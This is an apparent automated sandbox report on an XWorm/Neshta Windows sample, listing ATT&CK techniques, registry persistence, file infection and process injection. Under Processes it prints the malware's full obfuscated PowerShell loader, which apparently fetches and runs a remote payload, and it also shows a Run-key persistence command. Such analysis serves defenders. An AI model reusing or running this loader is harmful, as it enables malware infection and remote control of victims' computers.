Malware Analysis Report

2024-09-11 03:12

Sample ID 240521-edagnsge28
Target 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded
SHA256 a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336
Tags
neshta xworm persistence rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336

Threat Level: Known bad

The file 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded was found to be: Known bad.

Malicious Activity Summary

neshta xworm persistence rat spyware trojan

Xworm

Xworm family

Neshta

Detect Xworm Payload

Blocklisted process makes network request

Modifies system executable filetype association

Drops startup file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-21 03:48

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 03:48

Reported

2024-05-21 03:51

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Neshta

persistence spyware neshta

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\\ledelsessystemets\\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1756 set thread context of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 5064 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 3212 wrote to memory of 4428 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 4428 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 3252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 3252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 3656 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 3656 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 3656 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3580 wrote to memory of 4444 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3580 wrote to memory of 4444 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3580 wrote to memory of 4444 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4444 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4444 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4444 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xmwugm.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

